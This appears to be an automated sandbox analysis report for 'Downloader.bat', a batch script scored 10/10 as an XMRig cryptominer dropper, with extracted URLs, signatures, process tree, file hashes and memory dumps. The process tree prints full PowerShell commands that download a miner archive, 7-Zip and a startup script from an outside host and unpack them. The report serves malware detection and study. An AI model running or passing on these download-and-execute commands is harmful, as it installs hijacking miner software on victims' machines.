Overview

overview

10

Static

static

1

Downloader.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    1539s
  • max time network
    1174s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17/06/2024, 11:46

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Downloader.bat

  • Size

    1KB

  • MD5

    68c296ff7c1da026600f5a11359201ef

  • SHA1

    e592a339c4838b15eaa061a6a7a2e301d1c94bf3

  • SHA256

    706ae745b06209b2fe88151fc0f904bd0e72bef9c675f80d98b302e802495cc6

  • SHA512

    a111ac6f3583e2ce189209634d60484b1150736352f0cc0a4954ace90f3b060b223f4f6545d0ed297c1be2b0abb5c642fe6683ecc533501a22569c0fc332e0a1

Score
10/10
xmrigexecutionminer

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://allcoins.pw/dl/Miner.zip

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://allcoins.pw/dl/7z.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://allcoins.pw/dl/7z.dll

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://allcoins.pw/dl/dl.php?autoconfig=711648

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner payload 1 IoCs
    miner
  • Blocklisted process makes network request 8 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Using powershell.exe command.

    execution
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
    adwarespyware
  • Modifies registry class 38 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 12 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Downloader.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2916
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Invoke-WebRequest https://allcoins.pw/dl/Miner.zip -OutFile THE.MINER.zip"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1404
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "(New-Object Net.WebClient).DownloadFile('https://allcoins.pw/dl/Miner.zip', 'THE.MINER.zip')"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1760
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Invoke-WebRequest https://allcoins.pw/dl/7z.exe -OutFile 7z.exe"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2416
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "(New-Object Net.WebClient).DownloadFile('https://allcoins.pw/dl/7z.exe', '7z.exe')"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4716
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Invoke-WebRequest https://allcoins.pw/dl/7z.dll -OutFile 7z.dll"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:380
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "(New-Object Net.WebClient).DownloadFile('https://allcoins.pw/dl/7z.dll', '7z.dll')"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1920
    • C:\Users\Admin\AppData\Local\Temp\7z.exe
      C:\Users\Admin\AppData\Local\Temp\7z.exe x C:\Users\Admin\AppData\Local\Temp\THE.MINER.zip -oC:\Users\Admin\AppData\Local\Temp\Allcoins_Miner\
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of AdjustPrivilegeToken
      PID:2816
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Invoke-WebRequest https://allcoins.pw/dl/dl.php?autoconfig=711648 -OutFile C:\Users\Admin\AppData\Local\Temp\Allcoins_Miner\start.cmd"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3008
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "(New-Object Net.WebClient).DownloadFile('https://allcoins.pw/dl/dl.php?autoconfig=711648', 'C:\Users\Admin\AppData\Local\Temp\Allcoins_Miner\start.cmd')"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2028
    • C:\Windows\explorer.exe
      C:\Windows\explorer.exe C:\Users\Admin\AppData\Local\Temp\Allcoins_Miner\
      2⤵
        PID:1464
    • C:\Windows\explorer.exe
      C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
      1⤵
      • Modifies Internet Explorer settings
      • Modifies registry class
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious use of SetWindowsHookEx
      PID:4820
    • C:\Windows\System32\rundll32.exe
      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
      1⤵
        PID:4104

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
        Filesize

        2KB

        MD5

        2f57fde6b33e89a63cf0dfdd6e60a351

        SHA1

        445bf1b07223a04f8a159581a3d37d630273010f

        SHA256

        3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

        SHA512

        42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        f4ab534e526523be8c21fc74dea55a02

        SHA1

        4b9e2fbaea4ba04420f3c7e1c2036957870d532f

        SHA256

        9f8c21128ec2e6536b6775255d0f1e8f2fc6ef68c1adaae91673da0969cb40e9

        SHA512

        21b1904c6c0b28b478414c6d854c8f8814b1830d7156e18802bf361a43a047fe16793fcddc52b1d1e421d87c13e94377f98cca5eaa5b2b4980aa15fd0dc260ac

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        13c47d6f64b20a12a5793d97d0f03ae5

        SHA1

        2ac5630ccefc2cef606365804fccf4e0ea15a303

        SHA256

        6044a0c8fab80f47aa79bce942c3f1ef1846fb557705cca48e5afb5e081c01ee

        SHA512

        b2f610994f46870b50a4c2c8566692b3b7a65ea48d4b9b24ecfe0f0f129f9ec96a59e98837da06aca81676957b6d3e2eedfcebe39194fc31c734fd9c6d868f93

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        08f9f3eb63ff567d1ee2a25e9bbf18f0

        SHA1

        6bf06056d1bb14c183490caf950e29ac9d73643a

        SHA256

        82147660dc8d3259f87906470e055ae572c1681201f74989b08789298511e5f0

        SHA512

        425a4a8babbc11664d9bac3232b42c45ce8430b3f0b2ae3d9c8e12ad665cd4b4cbae98280084ee77cf463b852309d02ca43e5742a46c842c6b00431fc047d512

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        d05f0de005303c188bc415827550d910

        SHA1

        2f0a5721d5b9d9693d3b227261131e5623fd08c5

        SHA256

        da4a40d26e17b860a8619b57934a5f5eb1ecf5da2c10d91db7ae533318f5828f

        SHA512

        3c664d40ea3ce0d3a880f50a217a91adde3c97217773fc67a735255677b11f194e484aec7d85c4abc7625ba5160d585eee97f881aeb72d7e843eb0d730f80a0f

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        b4a80a9dbaa8d68b3db1effba3c78769

        SHA1

        67f9c254b68ba75b9ca7a222fd0deef7f62ebb41

        SHA256

        ca96ffd0b646e20da75fde6487eb7cacce9d0bf12eed4c800fc87e4e241065b9

        SHA512

        b45c25c6b914cb1249d7ff35f7d18ade48c4eb1e86f041b51a961b71dbbb9b77aac1977f0c50dc2b2cf5a144b7f199e8d4387704dba47fb55b87c46a0296264e

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        fb787cc3a878b0b75d078291191c1607

        SHA1

        97dfd14a22fd673d0288651ab943a07bc75c8d79

        SHA256

        5e6332ab28463f51aff12e8687bdc128a06fdf92c4c80ac83b9992e3ed9aba4a

        SHA512

        6a4a3d8751618afb406ea903d85486738ad8a48c087daf72f1b6023b59770b49b6c424e78647ca6b94dc3e7e55509201605b8d981040efe608328daa985b60af

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        b708c5f61173395602bc7487f1456e13

        SHA1

        34efc688e3029216bf141a8493ff854ec5c8b04e

        SHA256

        35b81d723e35927ad95223011f2b333abc4eb25eb8e1a7e3a36b2e12000f5816

        SHA512

        7ce46d853b8f3ce13a01989a42548818a0d857dc8afa25996bf2cf0f956df5506a568b1367c0eb83969465a556b519c3dc6f98174f035cfc905daf935031cd4b

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\7z.dll
        Filesize

        1.1MB

        MD5

        04e4f293970589ead1dc19fc8be60c92

        SHA1

        9ccf48bce8cd04b2bce5eb7b35e5e23b264ff70a

        SHA256

        6cd22f513ce36b4727bb6c353c58182c7cc8a14cbe3eefdca85c2a25906a0077

        SHA512

        c4cdbff5e295a516eab64433c16af3cef7ebec9d056ce8732b681fd37deaf389bc9655052ec3e06d14ca3353ebb547ef8ebd5bc78f8083b6d04eee2d9450f616

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\7z.exe
        Filesize

        283KB

        MD5

        77e556cdfdc5c592f5c46db4127c6f4c

        SHA1

        9289a79a81e008f349cb05cb851ae5eaef24b94a

        SHA256

        034eca579f68b44f8f41294d8c9dac96f032c57dee0877095da47913060dff84

        SHA512

        d2d83056bd4ca654bbf69fe17e1fcad19c3e813d0243e629a29f04b8e375dce278839c21fc18d5e06ff95b76deb574f8c09e50def0b52a81d65acdb69c0d6d5c

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\Allcoins_Miner\xmrig.exe
        Filesize

        4.3MB

        MD5

        b706ab08fa80004cd775f1acc71d90fa

        SHA1

        f22c892ef2f4653ba93283bd7dd92aafb78a004d

        SHA256

        52ec12984fd66fb14bc70d0c230681128b1ced46f8583e850171260ae2f0a4be

        SHA512

        8114ec470d561a46fad8ab872947d9bad9103053cd471e2f44b3cf1697ccff998addf8f3de7b5b1c88bcc40a8261a7d8d910170a0d16e3329c6f7d6c99b9f215

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\THE.MINER.zip
        Filesize

        17.0MB

        MD5

        d2196089e316c2acfba87b6a8592880c

        SHA1

        7216e17b718d980cb4108b997a05e7be4c41c0dd

        SHA256

        12df535b0778eea55088524ece50d92d36700e12f8237b18f7a7675ae92430a4

        SHA512

        c33961e8be372dcf5f2be27947869c2130d2d62540e694dd48c75d4fedb4b29c899b99ebf0de105f3169b8c94741caf4fd6f9f7cf0d00eec15b895e0bb0cbae9

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5zaocgim.icj.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • memory/1404-17-0x00007FF820C30000-0x00007FF8216F1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1404-18-0x00007FF820C30000-0x00007FF8216F1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1404-0-0x00007FF820C33000-0x00007FF820C35000-memory.dmp

        Filesize

        8KB

        Download

      • memory/1404-14-0x00007FF820C33000-0x00007FF820C35000-memory.dmp

        Filesize

        8KB

        Download

      • memory/1404-12-0x00007FF820C30000-0x00007FF8216F1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1404-11-0x00007FF820C30000-0x00007FF8216F1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1404-7-0x000001CCA2BD0000-0x000001CCA2BF2000-memory.dmp

        Filesize

        136KB

        Download

      • memory/1760-37-0x00007FF820C30000-0x00007FF8216F1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1760-34-0x00007FF820C30000-0x00007FF8216F1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1760-32-0x00007FF820C30000-0x00007FF8216F1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1760-31-0x00007FF820C30000-0x00007FF8216F1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1760-25-0x00007FF820C30000-0x00007FF8216F1000-memory.dmp

        Filesize

        10.8MB

        Download